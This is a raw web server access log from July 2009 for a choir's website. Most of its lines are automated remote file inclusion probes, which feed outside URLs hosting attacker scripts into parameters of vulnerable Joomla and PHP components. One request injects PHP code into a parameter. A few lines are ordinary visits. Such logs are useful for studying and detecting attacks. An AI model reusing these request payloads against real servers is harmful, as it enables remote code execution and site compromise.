89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:22:26 -0700] "GET /logs/access_090629.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:22:27 -0700] "GET /logs/access_090629.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:22:56 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:22:57 -0700] "GET /logs/access_090603.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:22:59 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:23:01 -0700] "GET /logs/access_090517.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:24:00 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:24:00 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:24:01 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:24:07 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:24:07 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:24:07 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:25:05 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:25:05 -0700] "GET /logs/access.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:25:05 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:25:30 -0700] "GET /logs/access_090626.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:26:07 -0700] "GET /logs/access_090626.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:27:41 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:27:41 -0700] "GET /logs/access.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:12:27:41 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:27:44 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:27:44 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:27:44 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /logs//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:29:44 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:12:30:05 -0700] "GET /logs/access_090620.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /logs//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:30:52 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:31:39 -0700] "GET /logs/access_090517.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:31:39 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:31:39 -0700] "GET /logs/access.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:31:44 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:35:55 -0700] "GET /rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:35:55 -0700] "GET /logs/access_090629.log/rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.184.72.18 - - [04/Jul/2009:12:35:55 -0700] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:36:03 -0700] "GET /logs/access_090318.log%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:36:07 -0700] "GET /logs/access.log%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:36:27 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:36:27 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:36:28 -0700] "GET /logs/access_090626.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:34 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:36:50 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:37:11 -0700] "GET /logs/access_090409.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:37:11 -0700] "GET /logs//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:37:11 -0700] "GET /?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:37:12 -0700] "GET /logs/access_090301.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:38:50 -0700] "GET /logs/access_090301.log%20//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:39:32 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:39:35 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:39:36 -0700] "GET /logs/access.log//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:39:38 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:39:39 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:39:52 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:39:52 -0700] "GET /logs/access_090626.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:40:09 -0700] "GET /logs/access.log//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:41:20 -0700] "GET /logs/access_090626.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:41:20 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:41:20 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:41:22 -0700] "GET /logs/access_090626.log//?sourcedir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:41:24 -0700] "GET /logs/access_090409.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:41:24 -0700] "GET /?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:41:24 -0700] "GET /logs//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:41:27 -0700] "GET /logs/access_090301.log//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:41:32 -0700] "GET /logs/access_090622.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
74.53.70.114 - - [04/Jul/2009:12:42:08 -0700] "GET /logs/access_090626.log//?sourcedir=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:42:17 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:42:19 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:43:09 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:43:11 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
92.50.143.90 - - [04/Jul/2009:12:43:35 -0700] "GET /logs/access_090301.log%20//?sIncPath=http://cdshop.net.ru/base/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:44:09 -0700] "GET /logs/access_090622.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.37.26.230 - - [04/Jul/2009:12:44:58 -0700] "GET /?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
218.37.26.230 - - [04/Jul/2009:12:44:58 -0700] "GET /logs/access_090301.log%20//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
218.37.26.230 - - [04/Jul/2009:12:44:58 -0700] "GET /logs//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
78.114.191.251 - - [04/Jul/2009:12:45:01 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009050519 Iceweasel/3.0.6 (Debian-3.0.6-1)" "www.americanboyschoir.com"
78.114.191.251 - - [04/Jul/2009:12:45:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.americanboyschoir.com/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009050519 Iceweasel/3.0.6 (Debian-3.0.6-1)" "www.americanboyschoir.com"
78.114.191.251 - - [04/Jul/2009:12:45:05 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.americanboyschoir.com/" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009050519 Iceweasel/3.0.6 (Debian-3.0.6-1)" "www.americanboyschoir.com"
59.103.87.114 - - [04/Jul/2009:12:45:08 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://74.125.153.132/search?q=cache:E7g5wMRboJAJ:www.americanboyschoir.com/xxx/+parent+directory+index+xxx+france&cd=1&hl=en&ct=clnk&gl=pk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.103.87.114 - - [04/Jul/2009:12:45:23 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
59.103.87.114 - - [04/Jul/2009:12:45:29 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:46:04 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:46:12 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /logs//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /logs/access.log//?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:46:35 -0700] "GET /?sourcedir=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:47 -0700] "GET /logs/access_090502.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:47 -0700] "GET /logs/access_090417.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:51 -0700] "GET /logs/access_090417.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:46:51 -0700] "GET /logs/access_090502.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:47:55 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:48:29 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:51:09 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.37.26.230 - - [04/Jul/2009:12:51:33 -0700] "GET /logs/access_090409.log//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
218.37.26.230 - - [04/Jul/2009:12:51:34 -0700] "GET /logs/access_090301.log//?sIncPath=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:12:52:10 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:12:53:46 -0700] "GET /logs/access_090517.log%20%20//include/write.php?dir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
